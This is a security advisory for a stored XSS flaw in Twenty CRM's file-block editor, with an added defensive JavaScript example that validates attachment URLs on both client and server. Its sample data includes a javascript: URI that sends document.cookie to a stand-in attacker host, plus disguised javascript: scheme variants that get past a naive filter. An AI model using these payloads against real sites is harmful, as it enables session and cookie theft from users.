Twenty CRM EUVD-2026-24161

CVE-2026-35451 | MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-21 | GitHub_M
CVSS 3.1 base score: 5.7

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

Patch available: Apr 21, 2026 - 18:01 (EUVD)
Analysis Generated: Apr 21, 2026 - 17:34 (vuln.today)

Description (NVD)

Twenty is an open source CRM. Prior to 1.20.6, a Stored Cross-Site Scripting (XSS) vulnerability exists in the BlockNote editor component. Due to a lack of protocol validation in the FileBlock component and insufficient server-side inspection of block content, an attacker can inject a javascript: URI into the url property of a file block. This allows the execution of arbitrary JavaScript when a user clicks on the malicious file attachment. This vulnerability is fixed in 1.20.6.

Analysis (AI)

Stored cross-site scripting in Twenty CRM versions prior to 1.20.6 allows an authenticated user to inject a javascript: URI into the url property of a file block via the BlockNote editor. The FileBlock component does not validate the URL's protocol and the server does not inspect block content before storing it, so the URI is persisted as-is and used as the click target of the attachment; when another user clicks the attachment, the injected JavaScript runs in that user's browser session (hence C:H with UI:R in the vector). Exploitation requires a click, but the payload is stored on the server and fires for every user who clicks the attachment in the affected record, for as long as it remains there. Upgrading to 1.20.6 or later removes the issue.
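Both the NVD description and the analysis above come down to two missing checks: the FileBlock component accepts any scheme in a file block's url, and the server stores block content without inspecting it. The following is an added example, not code from the Twenty project, showing what those checks look like: a protocol allowlist that uses the URL parser rather than a string prefix test (so case, whitespace and embedded-newline variants of javascript: are caught as well), and a server-side walk over a block document that reports and blanks offending urls. The block shape (type, props.url, children), the block type names and the sample note are assumptions constructed for this example.

```javascript
// Added example (not code from the Twenty project): a protocol allowlist for
// BlockNote-style file attachments plus a server-side walk over a block
// document, illustrating the two missing checks named in the advisory.
// The block shape (type / props.url / children) and the block type names
// are assumptions made for this example.

// Schemes a file attachment may legitimately point at. Allowlisting is the
// point: a denylist of "javascript:" misses the variants exercised below.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Block types assumed to carry a clickable props.url (assumption for this example).
const URL_BEARING_BLOCK_TYPES = new Set(["file", "image", "video", "audio"]);

// A naive prefix check, shown only to demonstrate what it misses.
function naiveIsSafeUrl(raw) {
  return typeof raw === "string" && !raw.startsWith("javascript:");
}

// Hardened check: the WHATWG URL parser lowercases the scheme, strips leading
// and trailing C0 controls and spaces, and removes embedded tabs and newlines,
// so the normalised scheme can be compared against the allowlist.
// Relative URLs (e.g. "/files/x.pdf") resolve against a placeholder base and
// are therefore accepted as same-origin links.
function isSafeAttachmentUrl(raw) {
  if (typeof raw !== "string") return false;
  let parsed;
  try {
    parsed = new URL(raw, "https://attachments.invalid/");
  } catch {
    return false; // unparseable: reject rather than guess
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol);
}

// Server-side inspection: walk the block tree depth first and report every
// URL-bearing block whose url fails the allowlist, with its index path.
function findUnsafeBlocks(blocks, path = []) {
  const findings = [];
  blocks.forEach((block, i) => {
    const here = [...path, i];
    const props = block.props || {};
    if (URL_BEARING_BLOCK_TYPES.has(block.type) && "url" in props && !isSafeAttachmentUrl(props.url)) {
      findings.push({ path: here, type: block.type, url: props.url });
    }
    if (Array.isArray(block.children)) {
      findings.push(...findUnsafeBlocks(block.children, here));
    }
  });
  return findings;
}

// Returns a sanitised copy suitable for storage: rejected urls are blanked so
// the block survives but is no longer a clickable javascript: link. The input
// is not mutated.
function sanitizeBlocks(blocks) {
  return blocks.map((block) => {
    const copy = { ...block, props: { ...(block.props || {}) } };
    if (URL_BEARING_BLOCK_TYPES.has(copy.type) && "url" in copy.props && !isSafeAttachmentUrl(copy.props.url)) {
      copy.props.url = "";
    }
    if (Array.isArray(block.children)) copy.children = sanitizeBlocks(block.children);
    return copy;
  });
}

// Constructed sample note (not real data): one benign attachment, one
// javascript: attachment, and one nested image whose scheme is disguised.
const SAMPLE_NOTE = [
  { id: "b1", type: "paragraph", props: {}, content: [{ type: "text", text: "Q3 contract" }], children: [] },
  { id: "b2", type: "file", props: { name: "contract.pdf", url: "https://files.example.com/contract.pdf" }, children: [] },
  { id: "b3", type: "file", props: { name: "invoice.pdf", url: "javascript:fetch('https://attacker.invalid/?c=' + document.cookie)" }, children: [] },
  { id: "b4", type: "paragraph", props: {}, content: [], children: [
      { id: "b5", type: "image", props: { url: " JaVa\nScRiPt:alert(document.domain)" }, children: [] },
  ] },
];

// Disguised variants that the naive prefix check accepts.
const BYPASS_SAMPLES = ["JavaScript:alert(1)", " javascript:alert(1)", "java\nscript:alert(1)", "\tjavascript:alert(1)"];

// Variants the naive check lets through but the hardened check rejects.
function bypassesNaiveCheck() {
  return BYPASS_SAMPLES.filter((u) => naiveIsSafeUrl(u) && !isSafeAttachmentUrl(u));
}

console.log("unsafe blocks:", JSON.stringify(findUnsafeBlocks(SAMPLE_NOTE)));
console.log("naive check misses:", bypassesNaiveCheck().length, "of", BYPASS_SAMPLES.length);
console.log("after sanitise:", findUnsafeBlocks(sanitizeBlocks(SAMPLE_NOTE)).length, "unsafe blocks");
```

The same isSafeAttachmentUrl belongs on both sides: in the editor component before the url is set on the block, and on every server write path (note create and update, API and import), because a client-side check alone is bypassed by submitting the block JSON directly. Blanking the url rather than rejecting the whole note is a design choice for this example; returning a validation error to the caller is equally defensible.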
